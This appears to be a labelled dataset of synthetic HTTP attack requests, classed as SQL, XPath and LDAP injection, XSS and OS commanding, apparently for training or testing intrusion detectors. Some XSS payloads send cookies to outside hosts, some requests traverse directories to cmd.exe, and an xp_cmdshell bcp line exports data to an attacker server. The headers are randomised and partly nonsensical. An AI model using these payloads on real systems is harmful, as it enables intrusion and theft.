GET /wlB8He/sl-fXkcEKQMxF5YfQ/im3sH5soWbzlcxuAit/9ixIDhMpo/EiEcnftsoatmhboc/0a4Dy9/wojVcqysn/baiuelUkpjLsnnT.asp?7evalletmp6=d&sac0=9311&r7Iuntpdrrlwn7h=%29&ii7=8i&cdgiic6k4tM=tcoddin&IwusXVoUX=92395752&tgnhbdoony5a=mochazt0&OsHk0=iE%27++or+++++rs%2Fdese%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D0%5D+++++or++++%27cnasdn%27+++%3D+%27&wv=s_Jv&eudfWinqgNsd=0684&czyoli=useedr+ HTTP/1.0
Host: www.niuaihmi.be
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.131.115.59
Cookie: 7gos=oSBJVZ30_;oim4oetaoosT=mocha;eLbeIa=eee
Cookie2: $Version="646"
Date: Thu, 16 Feb 06 18:13:35 GMT
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: oitbte
From: ilheiOI@yzloo.de
If-Modified-Since: Sun, 26 Oct 08 16:07:11 GMT
If-Unmodified-Since: Sun, 25 Sep 05 05:58:13 CET
If-Match: "pZkrUhx7ku9-5baPA3"
If-None-Match: "Exsdm9BaM21BIRxaF6"
If-Range: Fri, 14 Sep 07 11:34:59 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic MmkxM0M6MXJiZQ==
Range: 39-,253249-,539-99
Referer: http://www.tAeob7aw.fr/kts4r.css
TE: deflate,gzip
Trailer: From
User-Agent: pmpDtJ http://www.gsoezEgN.ch
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 1tetD/1.0 65.246.153.130:6326
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49342
Start - Id: 41960
class: SqlInjection
GET /tOl2eS_k9/et7/lnGWqi/nncuePzerJta9pi/hBAmjVAm5jx/3xMVzU.m54T11FJ1yCC/phpO0wR10/yxExlWKX0OpositionzhzO/kTq.bin?bxz3c=En+egruinnne&Hy7dwewiu=ehae%3C&ICi1Oo0YBlib2=bz2l&dnAbr=%3B++insert+++into+++++OPENROWSET%28%27SQLoledb%27%2C%27uid%3Dk8itet%3Bpwd%3Dmdzce9d%3BNetwork%3DDBMSSOCN%3BAddress%3D19.161.156.0%2C1433%3B%27%2C%27select+++*+from+++++_sysdatabases%27%29%3B+select+++++*+++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&iynb=h%28window.opennz&HYvIQPOYl=0363&eajbia=lniebmru%3Eya2w&sbfsgaEsa=c%5C%5DsvR+er%40hrRe8Nopen2t+&Ns4iI=xp_aarl%3A&zm=b.FCw5LRMD&zolnrc=4%7Cth&Oatanrd=139&atit2hod6msp=nKhAMain9&wbodyh2processing-instructionLkkO=tsp0bNdlmi HTTP/1.0
Host: www.ytyistf.ch
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: max-stale
Client-ip: 241.210.73.73
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="90"
Date: Sun, 19 Apr 09 22:07:49 UTC
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Sat, 29 Aug 09 15:01:34 CET
If-Match: "HGuhKkWlm_XcbLAj"
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: Sun, 21 Feb 10 02:31:01 GMT
Max-Forwards: 2598
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="eosOeu"
Range: 170-12,11579-8643,1-
Referer: http://www.dWc6qrei.cz/egotl.cfm
TE: deflate,gzip;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 4.6; uo-s2; rv:7.8.9) Gecko/89191277
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41960
Start - Id: 42574
class: SqlInjection
GET /ErtfmPSnw6/mE852/N4itIrdoki.cfm?7dhuutte7=oi3th%29%25ufiea%3Cft%3F&htPr=seiofgeTfc&I4rac3lTimggsF=%28%3Aanb%7ENrgrlIa%7E&ibslsitreo=8310&eN9Atri=select++totarogi+from++ALL_USERS&tteioe3daE=b1oe HTTP/1.0
Host: 203.126.190.79
Connection: close
Accept: text/html;q=0.1, text/*, video/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.8, compress;q=0.0, identity, deflate, deflate;q=0.0
Accept-Language: AauhhM-r9wi2;q=0.7
Cache-Control: lsr=fsstEn
Client-ip: 197.109.140.61
Cookie: mEd=42;olhjtaZrNheifce= s+h3ntmpetebetweenTwt=;nwoesIAeyndieti=taw3 ur;W5eF7ZkWYO=3;nsi=1bi]R lh
Cookie2: $Version="533"
Date: Tue, 27 Feb 07 06:06:59 CET
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: "v_DIQ3diczXHTWt@XTn@"
If-Range: Sat, 12 Sep 09 18:10:38 UTC
Max-Forwards: 956
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: ofrd qMdd=ptigE
Range: 5581-955144,-188690,326959-661
Referer: /roZsg/o5mse.swf
TE: chunked,trailers,gzip;q=0.6
Trailer: From
User-Agent: NN6fggh (g8BVtcCFAd; lVWChv; oNwolCfsD)
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: aae/3.5 64.16.68.150, 1.8 www.bimenoc.js, 2.8 www.cyted.shtml:8338
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42574
Start - Id: 49696
class: XPathInjection
GET /hrRV/Yhle.netcatoTfx8/h0eMa/erarosxrariritF/oOr6t4qKIkeprE5t/wUI6iE@iJ4KK/ryBXBlsYDRT/ZQGcd3qetcls/5oijeimiiddoaouec/eifVa/k9cnSfcn0ragsa9dr/E@xlinkKZd4WepOmetae.mspx?m4sEcoqs=%2FVscriptrgroup+by&MEt.WxVARVEf=O%29a%5BhYeev%40scriptt&icen8ifihhal=tmeagar%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++%27ROvn3%27++++%3D%27&vrdtassceUdohlr=snrniedm5o HTTP/1.1
Host: 142.81.39.148:29773
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr
Accept-Encoding: *;q=0.6
Accept-Language: dbstx4od-a6d7d, 9ic-cEjth, i-dntes;q=0.3
Cache-Control: min-fresh=91314
Client-ip: 251.247.9.85
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="03"
Date: Wed, 30 Jul 08 10:30:42 UTC
ETag: W/"TepWF6.gWgxd88z"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Sat, 02 Dec 06 17:19:34 CET
If-Match: "VRZNLayvyq-fElq-"
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 8.1
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: NTLM ZHpwRXJyZGF3cmFFbmh0bnRhU2xlbHNUdHQ4ZWVhZXVy
Range: -394122
Referer: http://0yiw.uk/oCvd/eoEthe/6soatea/dAgd/Vi9n.pl
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.7 (compatible; MSIE 7.2; Open BSD i386; grflsp; hsisNau; hrotnf7heo)
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49696
Start - Id: 48031
class: XSS
GET /iGmpOTT4aQE@-gFEc/pe7sl/phyt70aeiCenonxoLLce/sQveM7376u/degtemui1e/ootrntgsuIelS/qXM9npSOCM/nategfuee/cmlo3GM/0treLlh9dlen.asmx?y5RQIM=%3Cdiv+++style%3D++%22++width%3A+++++expression%28%5Bwindow.open%28%27http%3A%2F%2F234.111.228.145%2Fis.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+%22+%3E&inHnhM7Eleghei=765&Gg=157 HTTP/1.0
Host: www.btxaqsd.fr:37612
Connection: yarjhe
Accept: audio/x-wav;q=0.2, text/*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.4, x-mac-ce, x-mac-korean;q=0.9, x-mac-ce;q=0.4, hz-gb-2312
Accept-Encoding: identity;q=0.7, deflate;q=0.4, deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=7
Client-ip: 250.162.9.82
Cookie: nlriraT=e
Cookie2: $Version="136"
Date: Wed, 10 Aug 05 04:28:13 CET
ETag: "RXIPZOoD.fV7rkbkIP4"
Expect: npRl7Nrr
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 23 May 09 04:49:00 GMT
If-Unmodified-Since: Thu, 27 Oct 05 09:03:19 UTC
If-Match: "8wq_NfbHrBPW9mNVe7L"
If-None-Match: *
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 7247
MIME-Version: 4.1
Pragma: stt33sax='hy8iiDih'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: -605,08388-217,461352-2
Referer: http://www.uead2.biz/iirrnbH/aqanqato.dll
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Wissgnrtt5/8.5.1.9
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: 4.5 www.thza.shtml, HTTP/8.2 www.bsomepyt.jpg, 9.8 www.TsiM.tiff
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 228.60.15.61
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48031
Start - Id: 48910
class: XPathInjection
GET /Etmp41Lfromu/a8@U0-9soL@U/vc-rIHAANfO/on.php4?shutdown3D3bA=+maexecfart1&6jhvq=ocsdoinl%27++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++%27xIrUro%27%3D++++%27&ahinbzbEatuv=598 HTTP/1.0
Host: 220.251.198.204
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: 0iao-bd;q=0.7, tdoe-lseeYv;q=0.9, ccdn-ssn
Cache-Control: max-age=3
Client-ip: 27.145.34.50
Cookie: h6ormttiylYy3=62004;Nouoe=lelgaum
Cookie2: $Version="0"
Date: Thu, 02 Mar 06 04:31:16 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: alsrgDt=Ugteta;eyxh2
From: nui8@hgERemx.net
If-Modified-Since: Wed, 04 Oct 06 08:28:34 GMT
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: *
Max-Forwards: 3
MIME-Version: 2.9
Pragma: ss=Fsatx
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://www.eealhFtn.org/nh5taW5/9uoidls7.rar
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/9.0 (Windows; U; WinNT 6.7; bn-aE; rv:1.2.7) Gecko/15927789
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48910
Start - Id: 42865
class: OsCommanding
GET /rzhliadagoe0/dimdeeHhgcii5ent/gxmerayt/az8zZvisEULAo8O.Hxf/goovahEaElowpthS1ch/r6dv3Ioattehotss/8xMquFB2Yl5.exe?LvarQvyTNVs1KU=aHea&0Cj1etcC=5141853&otTeupaocrl=rqk&uUo2DV50from=jcezbp&TselectKRoFqH9Wb=5f%285Our&hwres=8cz+oaBctnpimgn&isal8keydioa1=8&sVue=%7C++dir+..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C HTTP/1.1
Host: 208.31.224.42
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lterse1-9nsoto8;q=0.4, iee-mv;q=0.9
Cache-Control: no-store
Client-ip: 4.100.41.101
Cookie: eI4ibe=alpt
Cookie2: $Version="08"
Date: Sun, 10 Sep 06 24:21:12 UTC
ETag: "7bCKFYFgjePn3tYHUg"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Sat, 18 Nov 06 16:07:26 GMT
If-Unmodified-Since: Thu, 17 May 07 03:50:25 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 15:18:40 CET
Max-Forwards: 5453
MIME-Version: 9.4
Pragma: aat=av3ee
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic Y3J0aGQ6bmR0amli
Range: -64,-955
Referer: /cuta/ejtze/6ye1/aonpa.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.2 (X11; U; Open BSD i386 5.9; fw-sk; rv:6.9.2) Gecko/55201524
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/4.5 www.e0sieaZ.jpg
Transfer-Encoding: ehna; 9x6nd=eghuec
Upgrade: inro/3.8, aXsnrs/2.9
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42865
Start - Id: 43774
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.f3oshh.de
Connection: focn0ee
Accept: image/png, audio/*
Accept-Charset: big5, big5
Accept-Encoding: *
Accept-Language: orleni-c;q=0.7
Cache-Control: max-stale=8584
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Tue, 17 Jun 08 15:46:41 GMT
ETag: "jz@gJWZ7STu9UBH8J@"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Wed, 23 Nov 05 13:12:05 GMT
If-Unmodified-Since: Mon, 21 Sep 09 02:21:32 GMT
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: "K60_PkDrhfFiNze"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: /lzhp.txt
TE: trailers,trailers,trailers
Trailer: From
User-Agent: 3mnhndeo (so.gVX; iG12jKKAt)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 834x118
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: iovfod; oustwbe=qNORAam
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43774
Start - Id: 43877
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.vaeMn.biz
Connection: czft2re
Accept: text/plain;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: ozitr2-Ra2ctv;q=0.6, xw-Nv;q=0.9, epoerRu-en;q=0.1, stt-st, tE-Naw;q=0.2
Cache-Control: max-stale
Client-ip: 184.162.182.17
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Sun, 22 Oct 06 04:39:51 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sun, 29 Feb 04 24:28:01 CET
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Thu, 17 Jan 08 19:30:39 CET
Max-Forwards: 04
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: NTLM bzlTcm52eXZvZ2FlaWxmSHdhb2N5c2llbnQ0TGkzUnQ=
Range: 40517-,9-9675
Referer: /1eia/anim68hn/ato7n/pzT9ht.mp3
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.3 (compatible; ahCe2ote3D; Unix; otrjnAtssr; ioc7hk9; iai4m)
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: deflate
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43877
Start - Id: 43786
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.e7bhhlc.ch
Connection: rhmndst
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 239.143.8.35
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="222"
Date: Tue, 10 Jun 08 08:08:37 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 02 Feb 04 23:52:49 UTC
If-Match: ".SZXlk0tUSsOQGtXMRc"
If-None-Match: *
If-Range: "wvEYw8..3_uUFxKgPMQ"
Max-Forwards: 6
MIME-Version: 5.3
Pragma: 8j='g'
Proxy-Authorization: NTLM ZmxlYXN1dXJhYU12b25ob25mQm5JYWVzbHR0bmlhYXNoNnVyZw==
Authorization: pTeest obeyj=ge1a
Range: 10571-03
Referer: http://www.neazgl.net/etsb/2acr/r8rnatd.swf
TE: trailers,trailers,gzip;q=0.3
Trailer: Pragma
User-Agent: c0Yj1P. http://www.ytae.biz
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 154x454
Via: HTTP/2.5 181.197.68.245, FTP/3.5 www.edewa.css
Transfer-Encoding: identity
Upgrade: tEYegn/9.0, l5aur/2.0, tbef/0.2, 8mru/4.2, Nsq/6.6
Warning: 848 www.ellxsil2.jpg "n5rnlcviw" "Wed, 23 Mar 05 14:33:15 GMT"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43786
Start - Id: 44265
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 26.41.149.173:23
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=834
Client-ip: 225.50.172.247
Cookie: istTyrtPe=629;miheazelr=836;mgnc.3U=60;0ennidhshek=h1LVrge;yecld2i=26140631;eea5et0gu=ihdsdAt24veie
Cookie2: $Version="544"
Date: Sat, 21 Feb 04 03:19:49 CET
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Mon, 20 Mar 06 04:59:29 UTC
If-Match: *
If-None-Match: *
If-Range: "N64qNim4zPvrUf_"
Max-Forwards: 9
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Digest algorithm=osHre
Range: 1630-9,-816
Referer: /e1tpt/ossclh.mdb
TE: gzip;q=0.0,chunked,deflate
Trailer: Referer
User-Agent: 7oDmnt/7.0.4.3
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: gzip
Upgrade: ytc/5.0, mosem/3.9
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44265
Start - Id: 47950
class: XSS
GET /dQpZvhHxh_DE9GqPF/1fi2sse/SBBLCOE/ffEIsystembetweenW/6a0s/aqjIP7o/itv.css?a2wys=hse%288a%2Fyoir+bmt&ttsguts=hyttnwo&De6ILupdateWKDoO=tGruSiIQUp4&P5dni3d=%2BrgtsoeWrcp%27iersy&sucwbtrHm=-etgpdbtboeeeeohomeEdan&bKRveFZnT=%3Cimg+++src%3D+%22++livescript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ra.com%2Fcgi-bin%2Fseicllsi.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&Oogj=slnyh5mna9nebiuotx&sxq7biJar=a8aittocIsteYa&tg=di&gnwheiiae5oa2ue=NHeo&pMLLE=940116 HTTP/1.0
Host: www.l2sCstos9.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=279
Client-ip: 55.58.52.249
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="771"
Date: Sun, 28 Mar 10 21:08:50 UTC
ETag: "lT7Ksneo3lP4TiG"
Expect: 6eyHrt=uh5Fndw;srtt=eyNndbn
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Sun, 09 Mar 08 18:16:01 CET
If-Match: "_bn6lvlK6S-7dZrfECIG"
If-None-Match: *
If-Range: Sat, 24 Jan 04 15:20:52 UTC
Max-Forwards: 47
MIME-Version: 2.0
Pragma: Rors=adntg
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Digest nc=D3344DE4
Range: -162,92-
Referer: /tbskg.php
TE: trailers
Trailer: Date
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 1.8; qr-ie; rv:1.2.7) Gecko/11676595
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5386x6954
Via: 2.2 91.238.116.162, FTP/8.1 237.1.167.48:12, 2.3 www.de50T.jpg
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47950
Start - Id: 41085
class: SqlInjection
GET /edtow/fwRxAB9L3/nnotvemeaipoa7/lfN2Jf4-rl3FUu/p8XyeGtfM/qTrr_@dQWm-1.bin?se=exec++++xp_cmdshell++++%27bcp++%22select+*++++from+++++8gbi9N0%22++++queryout++pwdump.exe+++-c+++++-Craw+++++-Shackersip++-Usa+++++-Ph8ck3r%27&tTrhputehr=t+a&rcpqimgacnQYN_=0995&an=8427810&p7p6hTr0eh2=4785&ipertb=lhb1rn1t%3Ala HTTP/1.1
Host: 104.222.224.237
Connection: keep-alive
Accept: application/zip;q=0.8, image/jpeg
Accept-Charset: x-mac-icelandic;q=0.7
Accept-Encoding: compress, identity;q=0.3, identity, gzip;q=0.4, gzip
Accept-Language: lrqn-nhisao, b6efp-sal, aAiaoe-dnsTeo;q=0.8
Cache-Control: no-cache
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="624"
Date: Mon, 13 Dec 04 23:17:18 CET
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Sun, 21 Dec 08 07:19:48 UTC
If-Unmodified-Since: Sun, 18 Dec 05 17:06:33 CET
If-Match: "5QIg1LBKZrJufY8Zbegw"
If-None-Match: "@0LlyPjLPfAUs4TH"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: stxR2zt=afm
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 000-,-068966
Referer: http://cuBvee.ch/teeT/osS7rnoI/raeeh.jsp
TE: trailers
Trailer: From
User-Agent: Soowi (s9Ut88IE)
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: 0.5 www.cpnat.shtml, tu3nt/9.5 210.143.183.53, 8.3 221.231.92.90
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41085
Start - Id: 38987
class: LdapInjection
